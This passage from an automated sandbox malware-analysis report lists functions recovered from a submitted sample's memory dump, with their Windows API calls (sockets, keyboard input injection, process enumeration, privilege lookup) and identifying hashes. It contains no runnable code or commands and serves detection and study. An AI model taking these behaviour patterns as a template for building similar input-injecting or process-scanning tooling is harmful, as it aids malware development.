                                                • CLSIDFromProgID.OLE32(?,?,00000000,007FFB80,000000FF,?,00000000,00000800,00000000,?,00802C7C,?), ref: 007C7A4F
                                                • _memcmp.LIBCMT ref: 007C7A70
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: FromProg$FreeTask_memcmp
                                                • String ID:
                                                • API String ID: 314563124-0
                                                • Opcode ID: 72041a47bda4002471393b9e20e1e6aac77c97b50409fe2ed44fa2fdda7b1f5d
                                                • Instruction ID: f2ec01d4c71c4a9418441e9d64cfb444444ce5695db59e095b1d22addcb433d9
                                                • Opcode Fuzzy Hash: 72041a47bda4002471393b9e20e1e6aac77c97b50409fe2ed44fa2fdda7b1f5d
                                                • Instruction Fuzzy Hash: 9781E971A00109EFCB04DF94C988EAEB7B9FF89315F20859DE515AB250DB75AE05CF60
                                                Function 007C6BD3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Variant$AllocClearCopyInitString
                                                • String ID:
                                                • API String ID: 2808897238-0
                                                • Opcode ID: a9de26e42c516458496612878cccbae71e8efaa0e35262c4629cc26f6b1c0d9c
                                                • Instruction ID: c42cde5be03cece5e74ec9f852981bd3d3b8f21b1f2895450cf4fd48679c7c2d
                                                • Opcode Fuzzy Hash: a9de26e42c516458496612878cccbae71e8efaa0e35262c4629cc26f6b1c0d9c
                                                • Instruction Fuzzy Hash: 4F518E34704702EBDF24AF65D8D5F6AB3E5EF44310B20882FE59ACB291DA789880CB55
                                                Function 007F9826 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 007F9895
                                                • ScreenToClient.USER32(00000002,00000002), ref: 007F98C8
                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007F9935
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Window$ClientMoveRectScreen
                                                • String ID:
                                                • API String ID: 3880355969-0
                                                • Opcode ID: 9e9780bfcdbd1d2f5eff7011d0bc74e82720fff6d02c42b32ca43200042fb699
                                                • Instruction ID: 995c0b93ab395179c3c08569e4bb985fbfb22b91f646a48cdb32ae0ccb334055
                                                • Opcode Fuzzy Hash: 9e9780bfcdbd1d2f5eff7011d0bc74e82720fff6d02c42b32ca43200042fb699
                                                • Instruction Fuzzy Hash: 98512B34A00209AFCF24DF58D880ABE7BB5FF85360F118569FA559B3A0D774AD41CB90
                                                Function 007E6AC0 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 007E6AE7
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6AF7
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007E6B5B
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007E6B67
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ErrorLast$__itow__swprintfsocket
                                                • String ID:
                                                • API String ID: 2214342067-0
                                                • Opcode ID: 81b87be1914f76a7043c2d66bf6c5c09037e43c274bd6930bfcdb0f7bb938a23
                                                • Instruction ID: cba3e231d315d1205b935e5ef122d91b92e8821f3a092e100671a8508618dba3
                                                • Opcode Fuzzy Hash: 81b87be1914f76a7043c2d66bf6c5c09037e43c274bd6930bfcdb0f7bb938a23
                                                • Instruction Fuzzy Hash: 63419274640200EFEB10AF24DC8AF7A77E99F48B50F54C018FA5D9B2D2DB789C008B55
                                                Function 007E6530 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                Download Yara Rule
                                                APIs
                                                • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,007FF910), ref: 007E65BD
                                                • _strlen.LIBCMT ref: 007E65EF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _strlen
                                                • String ID:
                                                • API String ID: 4218353326-0
                                                • Opcode ID: fe38efbdad69d20dcddd5aa4a93d22d7900c18dbd7d38fcaa4e22070ed49b8f7
                                                • Instruction ID: b016981f02c8f71a942c2f4ed37ab01dd486ab6cb41a39b9dae45a0cd948003d
                                                • Opcode Fuzzy Hash: fe38efbdad69d20dcddd5aa4a93d22d7900c18dbd7d38fcaa4e22070ed49b8f7
                                                • Instruction Fuzzy Hash: 1441C371A01104EFCF14EB65DCD9EBEB3A9EF58390F148169F51997292EB38AD00CB51
                                                Function 007DB880 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007DB92A
                                                • GetLastError.KERNEL32(?,00000000), ref: 007DB950
                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007DB975
                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007DB9A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                • String ID:
                                                • API String ID: 3321077145-0
                                                • Opcode ID: ba7ab1b4d517887a83e37089d87057f05cdafc55a7c4b306b4e8bdae0412001a
                                                • Instruction ID: 2a6fb21677fa011375bec8dc4c44396be55d9639c70a963b794976e2497a9918
                                                • Opcode Fuzzy Hash: ba7ab1b4d517887a83e37089d87057f05cdafc55a7c4b306b4e8bdae0412001a
                                                • Instruction Fuzzy Hash: 32414B39600650DFCF10DF15C488A69BBF5AF89320B09C099EA4A9B362CB38FD01CB95
                                                Function 007F8883 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                Download Yara Rule
                                                APIs
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007F8910
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: InvalidateRect
                                                • String ID:
                                                • API String ID: 634782764-0
                                                • Opcode ID: 99aa71d57d4527b84e0a9ecb8c8c6c96ae2bc14b86384a3563471444c711c3cf
                                                • Instruction ID: a5b1b3f66e809cdf93fd49b70c4818186b6e33bbf60134548a016351dab867e5
                                                • Opcode Fuzzy Hash: 99aa71d57d4527b84e0a9ecb8c8c6c96ae2bc14b86384a3563471444c711c3cf
                                                • Instruction Fuzzy Hash: 5B31AB3060110CBEEFA0DB58CC49BB937A5BB06360F544525FB51EA3A1CEB8B9809A53
                                                Function 007FAB69 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ClientToScreen.USER32(?,?), ref: 007FAB92
                                                • GetWindowRect.USER32(?,?), ref: 007FAC08
                                                • PtInRect.USER32(?,?,007FC07E), ref: 007FAC18
                                                • MessageBeep.USER32(00000000), ref: 007FAC89
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                • String ID:
                                                • API String ID: 1352109105-0
                                                • Opcode ID: 88f6d5a76c135dd02eff6911a5d037bda9dfec20ad84dad4f02cd5766bbbd413
                                                • Instruction ID: b96290a66da531e32b6776c378294f66c0bc2959a5d7f338c78bc113c362beb2
                                                • Opcode Fuzzy Hash: 88f6d5a76c135dd02eff6911a5d037bda9dfec20ad84dad4f02cd5766bbbd413
                                                • Instruction Fuzzy Hash: CC415CB0600219EFCF11CF58C884A797BF5FF48710F1485A9EA189B361D738E945CB62
                                                Function 007D0E07 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 007D0E58
                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 007D0E74
                                                • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 007D0EDA
                                                • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 007D0F2C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: c7eb9c9c882f9d9746a553ff555785e3809465a74fc6363e73a9ae0138cace45
                                                • Instruction ID: 5b331dd3c05a3fd3d21f57e495b4b520a68e2debc0841cf9438aa2ea32d978cd
                                                • Opcode Fuzzy Hash: c7eb9c9c882f9d9746a553ff555785e3809465a74fc6363e73a9ae0138cace45
                                                • Instruction Fuzzy Hash: 6A313730940218AEFB30DB258809BFABB75EF88310F18561BF0D0523D1C77D895597E5
                                                Function 007D0F42 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 007D0F97
                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 007D0FB3
                                                • PostMessageW.USER32(00000000,00000101,00000000), ref: 007D1012
                                                • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 007D1064
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: KeyboardState$InputMessagePostSend
                                                • String ID:
                                                • API String ID: 432972143-0
                                                • Opcode ID: 2d6944e82dc9100c2c89461a0939905dc819a593f75672c669fe74f42c8f1a9e
                                                • Instruction ID: 9180908334c65eb0ff42345093c6e325a6cb2e18fc1840b0bc8492f1ecd384d5
                                                • Opcode Fuzzy Hash: 2d6944e82dc9100c2c89461a0939905dc819a593f75672c669fe74f42c8f1a9e
                                                • Instruction Fuzzy Hash: AA313830A40288FEFF349B25C808BFABBB5AF49311F54421BE495923D1C77C89D197A1
                                                Function 007A6345 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007A637B
                                                • __isleadbyte_l.LIBCMT ref: 007A63A9
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007A63D7
                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007A640D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
                                                • Opcode ID: 36cc5d23c4bb4c45b076e62ca240596b23604dd9f1253f8bfe85069797b6c18d
                                                • Instruction ID: 11ff0882fb4d018940fb12aec49884da8c6bac94dda66a3795c56cc0fea5f4bb
                                                • Opcode Fuzzy Hash: 36cc5d23c4bb4c45b076e62ca240596b23604dd9f1253f8bfe85069797b6c18d
                                                • Instruction Fuzzy Hash: 6731AF31600286EFDF218F75C884ABA7BA5FF86310F194229F8248B191EB39D951DB50
                                                Function 007F4F57 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 007F4F6B
                                                  • Part of subcall function 007D3685: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007D369F
                                                  • Part of subcall function 007D3685: GetCurrentThreadId.KERNEL32 ref: 007D36A6
                                                  • Part of subcall function 007D3685: AttachThreadInput.USER32(00000000,?,007D50AC), ref: 007D36AD
                                                • GetCaretPos.USER32(?), ref: 007F4F7C
                                                • ClientToScreen.USER32(00000000,?), ref: 007F4FB7
                                                • GetForegroundWindow.USER32 ref: 007F4FBD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                • String ID:
                                                • API String ID: 2759813231-0
                                                • Opcode ID: 7fd2ab64f5d362bbd20bf112156533ce3faadebb14364ed99bd312bda72854b0
                                                • Instruction ID: b44a86709ed8a68f8851f6ed7eba188c804a9db04980adb0e31ad7e92235dc96
                                                • Opcode Fuzzy Hash: 7fd2ab64f5d362bbd20bf112156533ce3faadebb14364ed99bd312bda72854b0
                                                • Instruction Fuzzy Hash: E6313071901108AFDB00EFA5C8899EFB7F9EF88300F11806AE505E7251EA799E45CBA1
                                                Function 007D3C99 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 007D3CBE
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 007D3CCC
                                                • Process32NextW.KERNEL32(00000000,?), ref: 007D3CEC
                                                • CloseHandle.KERNEL32(00000000), ref: 007D3D96
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 420147892-0
                                                • Opcode ID: 0ca781aa389cc831e4995127c96b6e122e914bf93eb7d58e427b7232c30c8ccd
                                                • Instruction ID: f2850831c3122221af40930a1b401edd25a6b10178a381cd86082019cad65487
                                                • Opcode Fuzzy Hash: 0ca781aa389cc831e4995127c96b6e122e914bf93eb7d58e427b7232c30c8ccd
                                                • Instruction Fuzzy Hash: 2C31B471108305DFD704EF10C885AAFBBF8EF95394F14492EF585862A1EB789A49CB93
                                                Function 007FC502 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00772612: GetWindowLongW.USER32(?,000000EB), ref: 00772623
                                                • GetCursorPos.USER32(?), ref: 007FC53C
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,007ABB2B,?,?,?,?,?), ref: 007FC551
                                                • GetCursorPos.USER32(?), ref: 007FC59E
                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,007ABB2B,?,?,?), ref: 007FC5D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                • String ID:
                                                • API String ID: 2864067406-0
                                                • Opcode ID: a808366b9f2186c550a42b4323ab5fd3977e1ca96f5ec4873463f7f9abd21dd9
                                                • Instruction ID: 5076baa0169c1942fb12102ec2f4bf30e49ac85f51add017991b8e612e4ceef7
                                                • Opcode Fuzzy Hash: a808366b9f2186c550a42b4323ab5fd3977e1ca96f5ec4873463f7f9abd21dd9
                                                • Instruction Fuzzy Hash: 9331733660041CEFCB16CF68C958EBA7BB5FF49310F144465FA058B261D739AD61DBA0
                                                Function 007C897E Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007C8432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C8449
                                                  • Part of subcall function 007C8432: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C8453
                                                  • Part of subcall function 007C8432: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8462
                                                  • Part of subcall function 007C8432: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8469
                                                  • Part of subcall function 007C8432: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C847F
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007C89CB
                                                • _memcmp.LIBCMT ref: 007C89EE
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007C8A24
                                                • HeapFree.KERNEL32(00000000), ref: 007C8A2B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                • String ID:
                                                • API String ID: 1592001646-0
                                                • Opcode ID: 3b80ca58265c8a9670111c0354a3f3f80a21db85b64a87937fa76fb273b6ec18
                                                • Instruction ID: 78f706e932065a2bd5a719af150e3bb97c4dd6967c72e8a2719215c9041383db
                                                • Opcode Fuzzy Hash: 3b80ca58265c8a9670111c0354a3f3f80a21db85b64a87937fa76fb273b6ec18
                                                • Instruction Fuzzy Hash: 6D216972E40109EBDF10DFA4C949FAEB7B8EF44355F15805EE854A7241EB38AA05CB52
                                                Function 00790B0C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                Download Yara Rule
                                                APIs
                                                • __setmode.LIBCMT ref: 00790B2E
                                                  • Part of subcall function 00775B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007D793F,?,?,00000000), ref: 00775B8C
                                                  • Part of subcall function 00775B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007D793F,?,?,00000000,?,?), ref: 00775BB0
                                                • _fprintf.LIBCMT ref: 00790B65
                                                • OutputDebugStringW.KERNEL32(?), ref: 007C6111
                                                  • Part of subcall function 00794C1A: _flsall.LIBCMT ref: 00794C33
                                                • __setmode.LIBCMT ref: 00790B9A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                • String ID:
                                                • API String ID: 521402451-0
                                                • Opcode ID: b3e36eef11fd9353a78fbddbf64c9f01ca6e78e73018568d6001206f3cd42481
                                                • Instruction ID: abbb87fd50dcc12ea78e37cb6297d8fd14ee4f02dc2384c43aecf841ad0d6f1c
